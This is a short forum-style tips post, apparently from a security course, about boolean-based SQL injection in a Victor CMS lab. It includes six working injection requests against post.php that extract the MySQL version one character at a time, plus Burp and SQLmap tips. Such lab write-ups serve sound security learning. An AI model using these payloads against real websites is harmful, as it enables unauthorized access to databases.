Tips Victor CMS - Exploiting Boolean-based SQL Injection Vulnerabilities

During the walkthrough by Alexis in the video it looked like things were not going as expected. I spend some time to try this out myself in the Victor CMS lab and want to share my experiences. It might be helpful for others. My observations are as follows:

  • The MySQL version detected by SQLmap (5.0.12 in my case) is not correct. Using exploit Victor CMS 1.0 - 'Search' SQL Injection - PHP webapps Exploit I was able to detect it as 5.5.56-log. This can cause confusion if you expect the substring(version(), x, y) to come with the same results as detected by SQLmap.
  • The correct use of substring(string, x,y) is to provide the position in the string with x and use y for the length of the string that you want to compare. In our case we do a match on one character, so y should always be 1.
  • In my case it did not work when the ‘=’-sign was URLencoded. Not sure why, but I noticed that the ‘=’-sign was not URL encoded when sending the request via the application. So in Burp after URLencoding the string I changed back the ‘%3d’ to ‘=’ and it worked reliably after that.

Calls with positive boolean result that determined the MySQL version (5.5.56 in my case):
Character 1: GET /post.php?post=1+AND+substring(version(),1,1)=‘5’%23 HTTP/2
Character 2: GET /post.php?post=1+AND+substring(version(),2,1)=‘.’%23 HTTP/2
Character 3: GET /post.php?post=1+AND+substring(version(),3,1)=‘5’%23 HTTP/2
Character 4: GET /post.php?post=1+AND+substring(version(),4,1)=‘.’%23 HTTP/2
Character 5: GET /post.php?post=1+AND+substring(version(),5,1)=‘5’%23 HTTP/2
Character 6: GET /post.php?post=1+AND+substring(version(),6,1)=‘6’%23 HTTP/2

In all these cases I got post 1 correctly loaded. With other values it did not load the post properly.

Hope this helps.

Yeah, that’s true… even when you exploit with sqlmap and show the banner you get the correct version:
banner: ‘5.5.56-log’